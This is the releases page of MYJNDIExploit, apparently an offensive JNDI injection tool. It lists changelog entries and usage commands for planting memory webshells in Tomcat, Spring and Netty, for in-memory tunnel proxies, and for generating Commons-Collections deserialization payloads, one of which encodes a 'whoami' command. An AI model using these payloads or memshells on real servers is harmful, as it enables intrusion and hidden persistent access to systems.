Releases: achuna33/MYJNDIExploit
Releases · achuna33/MYJNDIExploit
1.4.2
1.修改为冰蝎高版本内存马
2.添加内存tunnel 正向代理
使用:python neoreg.py -k filter -H "auth: fuck" -u "http://192.168.186.128:8080/"
使用例子:ldap://192.168.186.128:1389/Basic/filetertunnel 反序列化方式也和以前格式一样
生成字节码: -o 参数 java -jar MYJNDIExploit.jar -o /Deserialization/CommonsCollectionsK2/filetertunnel
V1.4.1
- 修复 打 tomcat 内存时目标不存在tomcat-embed-core.jar 导致webappClassLoaderBase.getResources(); 返回null 得问题
- 逐渐很难再忍受这么大的体积了,后面可能会删掉一些利用频率不高的jar 包
1.3
[修复TomcatMemshell1,在Spring 环境下报错
MYJNDIExploit1.2
可以像ysoserial 一样将生成的class 输出到文件
使用方法:java -jar MYJNDIExploit.jar -o /Deserialization/CommonsCollectionsK2/Command/Base64/d2hvYW1p
优点:可以自己构建class 参与到cc链中
使用生成得文件进行反序列化
MYJNDIExploit1.1
新增 适配高版本Spring 内存马 使用方式 /Basic/SpringMemshell2
新增 适配高版本Netty内存马 使用方式 /Basic/nettymeshell